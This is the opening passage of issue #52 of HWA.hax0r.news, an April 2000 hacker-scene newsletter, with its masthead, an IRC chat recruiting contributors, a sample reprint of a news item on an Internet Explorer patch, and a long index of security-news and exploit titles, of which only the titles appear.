[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 52 Volume 2 Issue 4 1999 Apr 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== = "ABUSUS NON TOLLIT USUM" = ========================================================================== Editor: Cruciphux (cruciphux@dok.org) A Hackers Without Attitudes Production. (c) 1999, 2000 http://welcome.to/HWA.hax0r.news/ *** NEW WEB BOARD NOW ACTIVE *** http://discserver.snap.com/Indices/103991.html ========================================================================== ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #52 covering Mar 13th to April 9th , 2000 ** 564 People are on the email notify list as of this writing. see note below in the Help Out! section re:distribution. ========================================================================== _ _ _ ___ _ _ | | | | ___| |_ __ / _ \ _ _| |_| | | |_| |/ _ \ | '_ \| | | | | | | __| | | _ | __/ | |_) | |_| | |_| | |_|_| |_| |_|\___|_| .__/ \___/ \__,_|\__(_) |_| WANT TO HELP? like what can I do? some answers to common questions, taken straight from IRC since, well why re-write it? :) ** Regarding the people on the email notification list with listbot. We now have a new listserv system setup with help from the generous people of the CCC (Chaos Computer Club) in Germany. 
If you haven't heard of CCC or don't know who they are you've been living under a rock ;) I am still working on the system it may or may not be ready for use as of this release, certainly it should be accessible for the next one, soon you will be able to receive the newsletter/zine directly delivered to your inbox (yay!). Stay tuned - Ed Early one night in #Hwa.hax0r.news ... Cruciphux: so do you really need help? cause I can start getting articles for ya if you want/need them yes damnit I do need help so what do I do.....look for articles...copy and paste them..... then hand them to you? what do you want to do? if you wanna do that sure, email em to me like that must have a source and or url though ok ppl always forget urls/sources and I can't print it without a source if u do and I haven't already put the info in you 'win' a Contributed by: space sn00zer! line under the article :) hehe and if yer good at it and get stuff I've never seen (like isn't on my excite newsbot list or on HNN etc) then you get promoted to 'staff' etc I should put this in there actually so ppl know what to expect ok cool and original articles? i'd kill for good original material heh stress on the 'good' but i'm not too picky if someone wants to make a fool of themselves in public. :-o so what kinda of articles.....anything? from programming to hacking....etc? pretty much heh technology, radio, science if it has a techno slant, and of course internet/web security and hacking related u know the drill yeah also just checkin... heh I need someone to do 'research' on web site defacements an adjunct to what attrition does like tell me about interesting defacements, I just print the sites list i get from attrition like how....person who defaced......??.......?? 
ohh ok theres a mailing list you can get on that tells you when sites get cracked thats a biggie i'm gonna be asking for in this issue print the 'good' defacements (shit with an angle) and track down/ identify defacers and groups etc ok cool:) with an eye towards possible profiles (group) and interviews (if they're doing something interesting) anything else? that looks good:) it doesn't seem that hard when you hear about people doing it k lemme know if you wanna do anything and lemme know what you want to do etc but now it sure seems harder than expected heh but it'll give me something to do at least well I do everything myself right now in free time and there are areas that i'd like to follow up on nad I just don't have the time so if ppl are willing to help i can keep putting out and hopefully things will get better too. well....I'll do anything you want me to do.....but following up on defacements and getting articles seems good right now otherwise i'd have to think about either downsizing or closing down and I don't want to do that really. ok good stuff local and 'small' stuff like whats going on at your schools computer lab ie: security policies is good angles for writing your own stuff too if that tickles your fancy doesn't have to be major world news *g* ok *** Quits: narq (I am free of all prejudices. I hate everyone equally) -=- And, sending in articles etc... Instead of emailing me this: (txt formatted to 80 cols) <-> Patching IE Security, Yet Again Security vulnerability affects the Win 2000 browser. Windows 2000 is finally here. And so is a patch for a security vulnerability in the Internet browser that is bundled with the new operating system. Microsoft issued the patch on Wednesday, the eve of the release of its much-delayed operating system. 
The bug, which Microsoft calls the Image Source Redirect vulnerability,
makes it possible for a malicious Web site operator to read certain types
of files on the computers of visitors using Internet Explorer versions
4.0, 4.01, 5.0, and 5.01. This means that the iteration of IE that is
distributed with Windows 2000, version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser
window. IE then checks the server's permissions on the new page. The
vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in
the server's domain, gaining access to the contents of the user's files
in the process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time,
and the Web site operator would need to know, or guess, the names and
locations of files. The operator would also be able to view only file
types that can be opened in a browser window, including .txt files,
Microsoft says.

http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html

<->

:: YOU can go ahead and do some editing yourself and send it like this: ::

<->

Patching IE Security, Yet Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by SugarKing

Security vulnerability affects the Win 2000 browser.

Source: PCworld
url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html

Windows 2000 is finally here. And so is a patch for a security
vulnerability in the Internet browser that is bundled with the new
operating system. Microsoft issued the patch on Wednesday, the eve of the
release of its much-delayed operating system.

The bug, which Microsoft calls the Image Source Redirect vulnerability,
makes it possible for a malicious Web site operator to read certain types
of files on the computers of visitors using Internet Explorer versions
4.0, 4.01, 5.0, and 5.01. This means that the iteration of IE that is
distributed with Windows 2000, version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser
window. IE then checks the server's permissions on the new page. The
vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in
the server's domain, gaining access to the contents of the user's files
in the process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time,
and the Web site operator would need to know, or guess, the names and
locations of files. The operator would also be able to view only file
types that can be opened in a browser window, including .txt files,
Microsoft says.

@HWA

<->

:: Doesn't seem like much but saves me a bunch of work and I can plug it
   straight into the zine text...

-=-

Etc .. any other questions/comments/ideas/etc email me, you know the
addy...

-=-

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         #
@ The HWA website is sponsored by CUBESOFT communications I highly        @
# recommend you consider these people for your web hosting needs,         #
@                                                                         @
# Web site sponsored by CUBESOFT networks http://www.csoft.net            #
@ check them out for great fast web hosting!                              @
#                                                                         #
#                     http://www.csoft.net/~hwa                           @
@                                                                         #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

  ____                              _
 / ___| _   _ _ __   ___  _ __  ___(_)___
 \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
  ___) | |_| | | | | (_) | |_) \__ \ \__ \
 |____/ \__, |_| |_|\___/| .__/|___/_|___/
        |___/            |_|

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general.
This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. 
*** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #52 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. 
From the Editor................................................... 03.0 .. Clearing up a nasty screw up in issue #51, here's what happened... 04.0 .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!................... 05.0 .. WebTV hit by "Melissa-Type" virus................................. 06.0 .. BlaznWeed interview, background info, exploit code and Sect0r..... 07.0 .. plusmail cgi exploit.............................................. 08.0 .. 2600 activism against the MPAA.................................... 09.0 .. Microsoft sends magazine full versions of Windows 2000............ 10.0 .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ........... 11.0 .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................ 12.0 .. HNN:Mar 13th:French Bank Card Algorithm Released ................. 13.0 .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ................... 14.0 ,, HNN:Mar 13th:Japanese Pirates Busted ............................. 15.0 .. HNN:Mar 13th:Online Handles Impose Fear .......................... 16.0 .. HNN:Mar 13th:Vendors Still Making Insecure Software .............. 17.0 .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................ 18.0 .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........ 19.0 .. HNN:Mar 14th:Tracking Down Coolio................................. 20.0 .. HNN:Mar 14th: DOJ Launches Cybercrime Site ....................... 21.0 .. HNN:Mar 14th: China Relaxes Crypto Rules ......................... 22.0 .. HNN:Mar 14th:Stallman on UCITA ................................... 23.0 .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................ 24.0 .. HNN:Mar 15th: UCITA Sign By Governor in Virginia ................ 25.0 .. HNN:Mar 15th:RIP Goes Before Commons Today ....................... 26.0 .. HNN:Mar 15th:Security Patch Locks Out Users ...................... 27.0 .. HNN:Mar 15th:DNA Used for Steganography .......................... 28.0 .. 
HNN:Mar 15th:Bugging SAT Phones .................................. 29.0 .. HNN:Mar 15th:More and more EZines ................................ 30.0 .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear ................ 31.0 .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil .................. 32.0 .. HNN:Mar 16th:FBI Site Hit by DOS Again ........................... 33.0 .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ............... 34.0 .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ...... 35.0 .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................ 36.0 .. HNN:Mar 16th:ISTF Releases Security Recommendations .............. 37.0 .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp.... 38.0 .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks ....... 39.0 .. HNN:Mar 17th:Secret Service Harassing Bernie S Again ............. 40.0 .. HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud. 41.0 .. HNN:Mar 17th:Computer History Lecture Series ..................... 42.0 .. HNN:Mar 17th: Australian Police To Increase Online Presence ...... 43.0 .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision ............. 44.0 .. HNN:Mar 20th:First Malicious Code Direct at WebTV ................ 45.0 .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ................... 46.0 .. HNN:Mar 20th:Judge Bans Anti-Filter Software ..................... 47.0 .. HNN:Mar 20th:We Spy To Prevent Bribes ............................ 48.0 .. HNN:Mar 20th:LAPD Tells Parody Site To Chill ..................... 49.0 .. HNN:Mar 20th:New Windows Worm Virus .............................. 50.0 .. HNN:Mar 20th:GNIT Now Freeware ................................... 51.0 .. HNN:Mar 20th:Online Criminals Labeled Boffins .................... 52.0 .. HNN:Mar 21st: Conflict In Kashmir Continues Online ............... 53.0 .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack ......... 54.0 .. 
HNN:Mar 21st:2600 AU to Broadcast DeCSS .......................... 55.0 .. HNN:Mar 21st:CIA Monitoring Upheld by Court ...................... 56.0 .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............ 57.0 .. HNN:Mar 22nd:Cybercrime On The Rise .............................. 58.0 .. HNN:Mar 22nd:The Next Version of Windows Leaked .................. 59.0 .. HNN:Mar 22nd:Toronto Business Held For Extortion ................. 60.0 .. HNN:Mar 22nd:Is the Census Secure? ............................... 61.0 .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web .......... 62.0 .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............ 63.0 .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ...... 64.0 .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ........... 65.0 .. HNN:Mar 23rd:Business May Be Protected Against FOIA .............. 66.0 .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............ 67.0 .. HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set .... 68.0 .. HNN:Mar 24th:Max Vision Indicted in San Jose ..................... 68.1 .. KYZSPAM: More on Max Vision bust.................................. 69.0 .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ........... 70.0 .. HNN:Mar 24th:Rack Mount Your iMac ................................ 71.0 .. HNS:Mar 24th:SECRETS STOLEN....................................... 72.0 .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................ 73.0 .. HNS:Mar 24th:PRIVACY ISSUES....................................... 74.0 .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................ 75.0 .. HNS:Mar 24th:FEARS OF FREENET..................................... 75.1 ...(More) Anonymous net access aiding and abetting online criminals?. 76.0 .. HNS:Mar 24th:FEDERAL CIO NEEDED................................... 77.0 .. HNS:Mar 24th:DETERRENT SENTENCES.................................. 78.0 .. 
HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC........................... 79.0 .. HNS:Mar 23rd:ALTERING WEB SITES................................... 80.0 .. HNS:Mar 23rd:SECURITY BREACHES.................................... 81.0 .. HNS:Mar 23rd:ATTACK COSTS RISE.................................... 82.0 .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS.................... 83.0 .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY.................... 84.0 .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT........................... 85.0 .. HNS:Mar 23rd:"ANTI-ARAB" BUG...................................... 86.0 .. HNS:Mar 23rd:OFFICE 2000 PATCHES.................................. 87.0 .. HNS:Mar 23rd:SHARING INFORMATION.................................. 88.0 .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS......................... 89.0 .. HNS:Mar 23rd:CRIME FIGHTING LAB................................... 90.0 .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES............................. 91.0 .. HNS:Patch available for OfficeScan vulnerability.................. 92.0 .. HNS:Gpm-root problems............................................. 93.0 .. HNS:Esafe Protect Gateway (CVP) problems.......................... 94.0 .. HNS:Bug in Apache project: Jakarta Tomcat......................... 95.0 .. HNS:MS SECURITY BULLETIN #18...................................... 96.0 .. HNS:S.A.F.E.R. Security Bulletin 000317........................... 97.0 .. HNS:Decon fix for con/con is vulnerable........................... 98.0 .. HNS:Cerberus Information Security Advisory........................ 99.0 .. HNS:Malicious-HTML vulnerabilities at deja.com.................... 100.0 .. HNS:Certificate Validation Error in Netscape Browsers............. 101.0 .. HNS:"OfficeScan DoS & Message Replay" Vulnerability............... 102.0 .. HNS:MS Security bulletin#17....................................... 103.0 .. HNS:Georgi Guninski security advisory #9.......................... 103.1 .. 
PSS:More MSIE crashing info by NtWakO............................. 104.0 .. HNS:Drive Mappings in Interactive Login........................... 105.0 .. HNS:DoS Attack in MERCUR WebView ................................. 106.0 .. HNS:Problem with Firewall-1....................................... 107.0 .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b................. 108.0 .. HNS:Extending the FTP "ALG" vulnerability ........................ 109.0 .. FreeBSD-SA-00:08: Lynx overflows.................................. 110.0 .. Curador? BUSTED................................................... 111.0 .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............ 111.1 .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario....... 112.0 .. Wrapster, the Napster hack fires up the trading fires............. 113.0 .. AceFTP vulnerabilty by Armour..................................... 114.0 .. Pursuit Zine #1 (Aug 99).......................................... 115.0 .. SecurityFocus.com Newsletter 33................................... 116.0 .. You can get into trouble for hacking!............................. 117.0 .. SSHD v2.0.11< (old) Watch your version numbers!................... 118.0 .. BBC:"Outdoing the hackers"........................................ 119.0 .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more). 120.0 .. HNN:Mar 27th:Inferno Busted in Brazil ............................ 121.0 .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth .......... 122.0 .. HNN:Mar 27th:PalmPilot WarDialer Released ........................ 123.0 .. HNN:Mar 27th:Mi5 Computer Stolen ................................. 124.0 .. HNN:Mar 27th:"HNN Wins Bad Ass Media Award"....................... 125.0 .. HNN:Mar 28th:French Ban Anonymous Internet........................ 126.0 .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........ 127.0 .. HNN:Mar 28th:2600 Under Fire From NBC ............................ 128.0 .. 
HNN:Mar 28th:Takedown Debuts in France ........................... 129.0 .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................ 130.0 .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................ 131.0 .. HNN:Mar 28th:Census Gets NSA to Look at Security ................. 132.0 .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................ 133.0 .. HNN:Mar 28th:China Bans MP3s ..................................... 134.0 .. HNN:Mar 29th:MostHated to Plead Guilty ........................... 135.0 .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........ 136.0 .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits ....... 137.0 .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........ 138.0 .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes.... 139.0 .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2............. 140.0 .. HNN:Mar 29th:Interview with Attrition Staff Posted................ 141.0 .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences........... 142.0 .. HNN:Mar 29th:@tlanta Con to be Held this Weekend.................. 143.0 .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft.............. 144.0 .. HNN:Mar 30th:Miramax Sued for Fugitive Game....................... 145.0 .. HNN:Mar 30th:Glassbook Shattered.................................. 146.0 .. HNN:Mar 30th:Yahoo Sued Over Piracy............................... 147.0 .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders... 148.0 .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions.......... 149.0 .. HNN:Mar 30th:Australia To Protect Privacy of Works................ 150.0 .. HNN:Mar 31st:Y2Hack Goes on in Israel............................. 151.0 .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil.... 152.0 .. HNN:Mar 31st:China Sets Up security Test Center................... 153.0 .. HNN:Mar 31st:Hackers Probe Physical Security of MIT............... 154.0 .. 
HNN:Mar 31st:DVD for Linux is Now Legal........................... 155.0 .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding.................. 156.0 .. CoreZine: New zine by lamagra of b0f.............................. 157.0 .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}... 158.0 .. Lets hack an NT box...how they are being defaced & how to secure.. 159.0 .. Hijack any .nu domain box (DoS/redirection/hijack)................ 160.0 .. The dreaded and most pheared return of the infamous GOAT!......... 161.0 .. b0f: exploit code to hang any linux machine by eth0............... 162.0 .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script.. 163.0 .. HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" .............. 164.0 .. HNN:Apr 3rd:Forget Cookies, Worry About Cache .................... 165.0 .. HNN:Apr 3rd:Identity Theft On the Rise ........................... 166.0 .. HNN:Apr 3rd:Computer Crime Laws .................................. 167.0 .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net............... 168.0 .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........ 169.0 .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP.......... 170.0 .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again)......... 171.0 .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense.......... 172.0 .. HNN:Apr 4th:New Mags are Now Available............................ 173.0 .. HNN:Apr 5th:De Beers Releases Personal Info....................... 174.0 .. HNN:Apr 5th:CFP In Toronto........................................ 175.0 .. HNN:Apr 5th:Enigma Machine Stolen From Museum..................... 176.0 .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................ 177.0 .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked.............. 178.0 .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................ 179.0 .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................ 180.0 .. 
HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking........... 181.0 .. HNN:Apr 6th:Enigma Suspect Busted................................. 182.0 .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........ 183.0 .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses....... 184.0 .. HNN:Apr 6th:History of the L0pht, Part 1.......................... 185.0 .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech... 186.0 .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors....... 187.0 .. HNN:Apr 7th:Links to Web Sites Illegal............................ 188.0 .. HNN:Apr 7th:British Companies Complacent.......................... 189.0 .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong 190.0 .. HNN:Apr 7th:Census Afraid of Electronic Intrusion................. 191.0 .. HNN:Apr 7th:Hardware Key Logger Introduced........................ 192.0 .. HNN:Apr 7th:Napalm Issue 4........................................ 193.0 .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER.......................... 194.0 .. HNS:Apr 8th:WAYS TO ATTACK........................................ 195.0 .. HNS:Apr 7th:STOLEN ACCOUNTS....................................... 196.0 .. HNS:Apr 7th:JAILED FOR SIX MONTHS................................. 197.0 .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION................... 198.0 .. HNS:Apr 7th:NET PRIVACY TOOLS..................................... 199.0 .. HNS:Apr 7th:SECURITY ADDITIONS.................................... 200.0 .. HNS:Apr 7th:COOKIES............................................... 201.0 .. HNS:Apr 7th:SECURE E-MAIL SERVICE................................. 202.0 .. HNS:Apr 7th:ONLINE MUGGERS........................................ 203.0 .. HNS:Apr 6th:SURVEY BY DTI......................................... 204.0 .. HNS:Apr 6th:COMPUTER CODES PROTECTED.............................. 205.0 .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT..................... 206.0 .. 
HNS:Apr 6th:CYBERPATROL BLOCK LIST................................ 207.0 .. HNS:Apr 5th:CRYPTO REGULATIONS.................................... 208.0 .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................ 209.0 .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE................. 210.0 .. HNS:Apr 5th:BUFFER OVERFLOWS...................................... 211.0 .. HNS:Apr 5th:PIRACY................................................ 212.0 .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER.................. 213.0 .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION................... 214.0 .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY................. 215.0 .. HNS:Apr 4th:FIGHT SPAM WITH SPAM.................................. 216.0 .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................ 217.0 .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers. 218.0 .. March 15th: CRYPTOGRAM newsletter................................. 219.0 .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........ 220.0 .. ISN:Feds Behind Recent Massive Web Hacking/Fwd.................... 221.0 .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................ 222.0 .. ISN:Naval officer in hot water over policy........................ 223.0 .. ISN:Police to step up fight against e-crime....................... 224.0 .. ISN:Developers blasted on security................................ 225.0 .. ISN:"Islands in the clickstream, in defense of hacking"........... 226.0 .. ISN:Man angry at employer swallows own head....................... 227.0 .. ISN:Nasa division battles the hack from ipanema................... 228.0 .. ISN:Toys'R'Us..................................................... 229.0 .. ISN:Computer expert accused of hacking............................ 230.0 .. ISN:Disney and Miramax Sued for 'Hacking'......................... 231.0 .. ISN:Hacker posts own version of Gore's speech online.............. 232.0 .. 
ISN:Bennett leads cyber defense................................... 233.0 .. ISN:Hackers rue blurred line between curiosity, vandalism......... 234.0 .. ISN:Curador worked as e-commerce consultant....................... 235.0 .. ISN:White house official charged with spreading phone codes....... 236.0 .. ISN:Hackers hold conference in Israel............................. 237.0 .. ISN:Old school MIT stylie "hacking" still makes news?............. 238.0 .. ISN:US Census tests security...................................... 239.0 .. ISN:Visa program targets online fraud............................. 240.0 .. ISN:GAO lists security bargains................................... 241.0 .. ISN:DeBeers leaks customer info................................... 242.0 .. ISN:Cybersleuths want to hack bill of rights...................... 243.0 .. ISN:Third laptop gets lifted...................................... 244.0 .. ISN:Government suck rocks at busting computer criminals........... 245.0 .. CanSecWest/core00 Canadian Security Conf.......................... 246.0 .. PSS: BeOs Network DoS............................................. 247.0 .. PSS: TESO Security Advisory BinTec router weakness................ 248.0 .. b0f: namedscan.c.................................................. 249.0 .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............ 250.0 .. PSS: CGI rmp_query scanner........................................ 251.0 .. PSS: New ircii exploit............................................ 252.0 .. PSS:Cerberus Information Security Advisory (CISADV000330)......... 253.0 .. PSS:Win32 Realplayer 6/7 Buffer Overflow.......................... 254.0 .. ISS Security summary data sheet................................... 255.0 .. PSS: suse kreatecd root compromise................................ 256.0 .. PSS: irix object server remote root exploit....................... 257.0 .. PSS: Sun bind advisory............................................ 258.0 .. 
Cyberprofiling....................................................
259.0 .. mIRC 5.7 Exploit code.............................................
260.0 .. Spaghetti proxy server exploit code...............................
261.0 .. schoolbus.c - netbus 1.7 client exploit crashes script kids box...
262.0 .. Protocol reverse engineering using Sub7 as an example.............
263.0 .. Essay:Elf Orin: The meaning of being a hacker.....................
264.0 .. Linux 2.2.x masq tunnel/hijack scenario...........................
265.0 .. AWARD Bios password cracker .c source code........................
266.0 .. Locked out? default BIOS/CMOS password list.......................

=-------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
that's tres cool, if not we'll consider ur ad anyways so send it in. Ads for
other zines are ok too btw just mention us in yours, please remember to
include links and an email contact.

Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh and it's hard
to find good stuff... ;)...........................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 .. Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. What's in a name? why HWA.hax0r.news??.........................
A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................

* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
